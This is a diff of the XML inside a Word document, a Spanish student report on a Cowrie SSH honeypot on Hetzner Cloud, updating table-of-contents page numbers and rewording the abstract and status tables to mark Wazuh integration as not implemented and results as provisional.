         </w:rPr>
-        <w:t xml:space="preserve">	22</w:t>
+        <w:t xml:space="preserve">	24</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1203,7 +1232,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	22</w:t>
+        <w:t xml:space="preserve">	24</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1232,7 +1261,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	23</w:t>
+        <w:t xml:space="preserve">	25</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1261,7 +1290,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	24</w:t>
+        <w:t xml:space="preserve">	26</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1290,7 +1319,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	25</w:t>
+        <w:t xml:space="preserve">	27</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1319,7 +1348,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	27</w:t>
+        <w:t xml:space="preserve">	29</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1348,7 +1377,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	27</w:t>
+        <w:t xml:space="preserve">	29</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1377,7 +1406,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	27</w:t>
+        <w:t xml:space="preserve">	29</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1406,7 +1435,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	28</w:t>
+        <w:t xml:space="preserve">	30</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1435,7 +1464,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	29</w:t>
+        <w:t xml:space="preserve">	31</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1464,7 +1493,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	29</w:t>
+        <w:t xml:space="preserve">	31</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1493,7 +1522,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	29</w:t>
+        <w:t xml:space="preserve">	31</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1522,7 +1551,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	30</w:t>
+        <w:t xml:space="preserve">	32</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1551,7 +1580,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	32</w:t>
+        <w:t xml:space="preserve">	34</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1580,7 +1609,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	32</w:t>
+        <w:t xml:space="preserve">	34</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1609,7 +1638,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	32</w:t>
+        <w:t xml:space="preserve">	34</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1638,7 +1667,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	33</w:t>
+        <w:t xml:space="preserve">	35</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1667,7 +1696,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	34</w:t>
+        <w:t xml:space="preserve">	36</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1696,7 +1725,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	34</w:t>
+        <w:t xml:space="preserve">	36</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1725,7 +1754,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	37</w:t>
+        <w:t xml:space="preserve">	39</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1754,7 +1783,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	37</w:t>
+        <w:t xml:space="preserve">	39</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1783,7 +1812,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	38</w:t>
+        <w:t xml:space="preserve">	40</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1812,7 +1841,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	39</w:t>
+        <w:t xml:space="preserve">	41</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1841,7 +1870,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	41</w:t>
+        <w:t xml:space="preserve">	44</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1870,7 +1899,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	42</w:t>
+        <w:t xml:space="preserve">	44</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1899,7 +1928,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	43</w:t>
+        <w:t xml:space="preserve">	45</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1928,7 +1957,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	44</w:t>
+        <w:t xml:space="preserve">	46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1957,7 +1986,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	44</w:t>
+        <w:t xml:space="preserve">	47</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1986,7 +2015,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	46</w:t>
+        <w:t xml:space="preserve">	48</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2015,7 +2044,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	46</w:t>
+        <w:t xml:space="preserve">	48</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2044,7 +2073,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	46</w:t>
+        <w:t xml:space="preserve">	48</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2073,7 +2102,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	46</w:t>
+        <w:t xml:space="preserve">	48</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2102,7 +2131,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	47</w:t>
+        <w:t xml:space="preserve">	49</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2131,7 +2160,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	48</w:t>
+        <w:t xml:space="preserve">	50</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2160,7 +2189,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	48</w:t>
+        <w:t xml:space="preserve">	50</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2189,7 +2218,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	50</w:t>
+        <w:t xml:space="preserve">	52</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2218,7 +2247,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	51</w:t>
+        <w:t xml:space="preserve">	53</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2247,7 +2276,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	51</w:t>
+        <w:t xml:space="preserve">	53</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2276,7 +2305,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	54</w:t>
+        <w:t xml:space="preserve">	56</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2305,7 +2334,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	55</w:t>
+        <w:t xml:space="preserve">	57</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2334,7 +2363,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	55</w:t>
+        <w:t xml:space="preserve">	57</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2363,7 +2392,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	55</w:t>
+        <w:t xml:space="preserve">	57</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2392,7 +2421,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	56</w:t>
+        <w:t xml:space="preserve">	58</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2421,7 +2450,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	57</w:t>
+        <w:t xml:space="preserve">	59</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2450,7 +2479,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	58</w:t>
+        <w:t xml:space="preserve">	60</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2479,7 +2508,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	59</w:t>
+        <w:t xml:space="preserve">	61</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2508,7 +2537,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	61</w:t>
+        <w:t xml:space="preserve">	63</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2537,7 +2566,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	62</w:t>
+        <w:t xml:space="preserve">	64</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2566,7 +2595,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	62</w:t>
+        <w:t xml:space="preserve">	64</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2595,7 +2624,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	62</w:t>
+        <w:t xml:space="preserve">	64</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2624,7 +2653,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	63</w:t>
+        <w:t xml:space="preserve">	65</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2653,7 +2682,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	64</w:t>
+        <w:t xml:space="preserve">	66</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2682,7 +2711,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	64</w:t>
+        <w:t xml:space="preserve">	66</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2711,7 +2740,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	64</w:t>
+        <w:t xml:space="preserve">	66</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2740,7 +2769,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	65</w:t>
+        <w:t xml:space="preserve">	67</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2769,7 +2798,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	66</w:t>
+        <w:t xml:space="preserve">	68</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2798,7 +2827,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	67</w:t>
+        <w:t xml:space="preserve">	70</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2827,7 +2856,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	69</w:t>
+        <w:t xml:space="preserve">	72</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2856,7 +2885,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	69</w:t>
+        <w:t xml:space="preserve">	72</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2885,7 +2914,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	71</w:t>
+        <w:t xml:space="preserve">	74</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2914,7 +2943,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	72</w:t>
+        <w:t xml:space="preserve">	75</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2943,7 +2972,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	73</w:t>
+        <w:t xml:space="preserve">	76</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2972,7 +3001,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	74</w:t>
+        <w:t xml:space="preserve">	77</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3001,7 +3030,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	76</w:t>
+        <w:t xml:space="preserve">	79</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3030,7 +3059,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	79</w:t>
+        <w:t xml:space="preserve">	82</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3059,7 +3088,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	82</w:t>
+        <w:t xml:space="preserve">	85</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3097,7 +3126,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Este proyecto aborda el despliegue y análisis de un honeypot SSH de media interacción basado en Cowrie, expuesto a Internet desde un servidor cloud de Hetzner. El sistema simula un servidor Linux vulnerable para atraer ataques automatizados —principalmente intentos de fuerza bruta, ejecución de comandos y descarga de malware— con el objetivo de estudiar las tácticas, técnicas y procedimientos (TTPs) empleados por los atacantes. Los datos capturados durante un período mínimo de tres semanas se procesan mediante un script Python desarrollado ad hoc que genera rankings de IPs atacantes con geolocalización, credenciales más utilizadas, comandos ejecutados y ficheros descargados. Los hallazgos se clasifican según el marco MITRE ATT&amp;CK y se acompañan de recomendaciones defensivas aplicables a entornos reales. Opcionalmente, los logs se ingestan en Wazuh (SIEM) para su visualización en dashboard. El proyecto demuestra cómo un honeypot de bajo coste proporciona inteligencia de amenazas accionable con herramientas exclusivamente de software libre.</w:t>
+        <w:t xml:space="preserve">Este proyecto aborda el despliegue y análisis de un honeypot SSH de media interacción basado en Cowrie, expuesto a Internet desde un servidor cloud de Hetzner. El sistema simula un servidor Linux vulnerable para atraer ataques automatizados —principalmente intentos de fuerza bruta, ejecución de comandos y descarga de malware— con el objetivo de estudiar las tácticas, técnicas y procedimientos (TTPs) empleados por los atacantes. Los datos capturados durante un período mínimo de tres semanas se procesan mediante un script Python desarrollado ad hoc que genera rankings de IPs atacantes con geolocalización, credenciales más utilizadas, comandos ejecutados y ficheros descargados. Los hallazgos se clasifican según el marco MITRE ATT&amp;CK y se acompañan de recomendaciones defensivas aplicables a entornos reales. Como ampliación opcional se propone la ingesta de los logs en el SIEM Wazuh, no implementada en esta fase. El proyecto demuestra cómo un honeypot de bajo coste proporciona inteligencia de amenazas accionable con herramientas exclusivamente de software libre.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3197,7 +3226,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">This project covers the deployment and analysis of a medium-interaction SSH honeypot based on Cowrie, exposed to the Internet from a Hetzner Cloud server. The system simulates a vulnerable Linux server to attract automated attacks —primarily brute-force login attempts, command execution, and malware downloads— with the goal of studying the tactics, techniques, and procedures (TTPs) used by attackers. Data captured over a minimum three-week period is processed by a purpose-built Python script that generates attacker IP rankings with geolocation, most-used credentials, executed commands, and downloaded files. Findings are mapped to the MITRE ATT&amp;CK framework and accompanied by defensive recommendations applicable to production environments. Optionally, logs are ingested into Wazuh (SIEM) for dashboard visualization. The project demonstrates how a low-cost honeypot provides actionable threat intelligence using exclusively open-source tools.</w:t>
+        <w:t xml:space="preserve">This project covers the deployment and analysis of a medium-interaction SSH honeypot based on Cowrie, exposed to the Internet from a Hetzner Cloud server. The system simulates a vulnerable Linux server to attract automated attacks —primarily brute-force login attempts, command execution, and malware downloads— with the goal of studying the tactics, techniques, and procedures (TTPs) used by attackers. Data captured over a minimum three-week period is processed by a purpose-built Python script that generates attacker IP rankings with geolocation, most-used credentials, executed commands, and downloaded files. Findings are mapped to the MITRE ATT&amp;CK framework and accompanied by defensive recommendations applicable to production environments. Ingesting the logs into the Wazuh SIEM is proposed as an optional extension and has not been implemented at this stage. The project demonstrates how a low-cost honeypot provides actionable threat intelligence using exclusively open-source tools.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6555,7 +6584,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Wazuh 4.9.2 instalado en máquina virtual local (componente opcional).</w:t>
+        <w:t xml:space="preserve">Wazuh 4.9.2 en máquina virtual local (componente opcional; su integración con el honeypot no se ha implementado en esta fase).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6782,7 +6811,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Cada objetivo específico se acompaña de un indicador verificable y de su estado a fecha de esta entrega (8 de octubre de 2026):</w:t>
+        <w:t xml:space="preserve">Cada objetivo específico se acompaña de un indicador verificable y de su estado a fecha de esta entrega (8 de octubre de 2026). Un objetivo «en curso» puede tener ya resultados parciales: es el caso de la captura (OE4), cuyos tres primeros días se analizan en el capítulo de Resultados con carácter provisional, aunque el objetivo solo se dará por cumplido al completar las tres semanas.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -7143,7 +7172,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">En curso (desde el 4 de octubre)</w:t>
+              <w:t xml:space="preserve">En curso (desde el 4 de octubre); resultados provisionales de 3 días</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7279,7 +7308,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Cumplido con datos parciales (98,5 %; 50/50 pruebas)</w:t>
+              <w:t xml:space="preserve">Cumplido sobre los datos parciales (98,5 %; 50/50 pruebas); se verificará con el periodo completo</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12640,7 +12669,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Integración con SIEM (Wazuh)</w:t>
+              <w:t xml:space="preserve">Integración con SIEM (Wazuh) — opcional, no implementada</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13915,6 +13944,765 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Descripción del Sistema</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Estado de los Componentes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Para evitar confusiones entre lo construido y lo planteado, la Tabla 5 indica el estado de cada componente del sistema a fecha de esta entrega (8 de octubre de 2026). Los resultados que se presentan en el capítulo de Resultados son provisionales: proceden de los tres primeros días de una captura que continúa hasta finales de octubre.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3016"/>
+        <w:gridCol w:w="1905"/>
+        <w:gridCol w:w="3016"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Componente</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Estado</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Evidencia</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Servidor en Hetzner Cloud (x86_64) y Cloud Firewall</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Implementado y probado</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Escaneo nmap externo (capítulo de Pruebas)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Bastionado del SSH de administración</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1200"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Implementado y probado</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
